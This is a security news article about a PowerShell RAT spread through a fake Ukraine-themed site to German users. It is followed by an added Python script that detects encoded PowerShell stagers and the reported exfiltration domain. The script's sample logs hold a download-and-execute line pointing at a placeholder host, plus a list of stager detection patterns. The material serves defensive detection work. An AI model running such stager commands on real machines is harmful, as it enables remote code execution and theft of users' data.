Ukraine supporters in Germany targeted with PowerShell RAT malware (Security News, May 2022)

An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.
The fake site offers malicious documents that install a custom RAT supporting remote command execution and file operations.
Visitors to the site find a file called "2022-Q2-Bedrohungslage-Ukraine," promising information about the situation in Ukraine and offered for free download. The corresponding section on the site claims that the document is constantly updated with new information, so users are urged to get a fresh copy every day.
In the background, the file launches PowerShell, which runs a Base64 deobfuscator that then fetches and executes a malicious script from the fake site.
The RAT itself is delivered as a .txt file, together with a .cmd file that helps execute it through PowerShell.

PowerShell RAT

The custom PowerShell RAT that hides in "Status.txt" begins its malicious operation by collecting basic system information and assigning a unique client ID. This information, and anything else stolen from the host computers, is exfiltrated to a German domain, "Kleinm[.]de".
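The two detection opportunities the chain above gives a defender are the Base64-encoded PowerShell launch (the deobfuscator stage) and traffic to the reported exfiltration domain. The script below is an added example, not code from the article or from the analysed malware: it scans constructed Sysmon-style process-creation and DNS log lines (not real telemetry), decodes any `-EncodedCommand` argument (UTF-16LE inside Base64, which is what powershell.exe expects), and flags decoded content that looks like a download-and-execute stager or that references the domain named in the article. The fetch URL inside the sample command is a labelled placeholder, since the page does not name the fake site.

```python
"""Added example: flag encoded PowerShell launches that decode to a
download-and-execute stager, and match the C2 domain named in the article."""
import base64
import re
from dataclasses import dataclass, field

# Exfiltration domain reported in the article (defanged there as Kleinm[.]de).
IOC_DOMAINS = ("kleinm.de",)

# Behaviours typical of a first-stage stager: fetch remote text, then evaluate it.
STAGER_PATTERNS = (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"net\.webclient",
    r"invoke-expression", r"\biex\b", r"frombase64string",
)

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class Finding:
    line_no: int
    decoded: str            # decoded command, or "" when the hit came from the raw line
    stager_hits: list = field(default_factory=list)
    ioc_hits: list = field(default_factory=list)


def decode_encoded_command(blob: str):
    """-EncodedCommand carries UTF-16LE text in Base64; return None if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line_no: int, line: str):
    """Return a Finding when the line (raw or decoded) is suspicious, else None."""
    low = line.lower()
    ioc_hits = [d for d in IOC_DOMAINS if d in low]     # e.g. DNS query logs
    decoded, stager_hits = "", []
    m = ENC_FLAG.search(line)
    if m:
        text = decode_encoded_command(m.group(1))
        if text is not None:
            decoded = text
            dlow = decoded.lower()
            stager_hits = [p for p in STAGER_PATTERNS if re.search(p, dlow)]
            ioc_hits += [d for d in IOC_DOMAINS if d in dlow and d not in ioc_hits]
    if not (stager_hits or ioc_hits):
        return None
    return Finding(line_no, decoded, stager_hits, ioc_hits)


def scan(lines):
    """Run analyze_line over every line; keep only suspicious ones."""
    out = []
    for i, line in enumerate(lines, 1):
        f = analyze_line(i, line)
        if f:
            out.append(f)
    return out


def _encode_for_sample(cmd: str) -> str:
    # Only used to build the constructed sample below; same encoding PowerShell expects.
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style log lines (not real telemetry); the stager URL is a placeholder.
SAMPLE_LOGS = [
    "EventType: ProcessCreate  Image: C:\\Windows\\System32\\cmd.exe  CommandLine: cmd.exe /c dir",
    "EventType: ProcessCreate  Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "  CommandLine: powershell.exe -nop -w hidden -enc "
    + _encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://fake-site.invalid/Status.txt')"),
    "EventType: ProcessCreate  Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "  CommandLine: powershell.exe -EncodedCommand "
    + _encode_for_sample("Get-Date | Out-File C:\\temp\\ts.txt"),
    "EventType: DnsQuery  QueryName: kleinm.de  Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f.line_no}: stager={f.stager_hits} ioc={f.ioc_hits}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

Decoding before matching is the point: a rule that only looks for `DownloadString` in the raw command line never sees it when the argument is Base64, while a rule that fires on every `-EncodedCommand` drowns in legitimate automation (the third sample line). Matching the IOC domain against the raw line as well catches the exfiltration step even when the launch itself was missed.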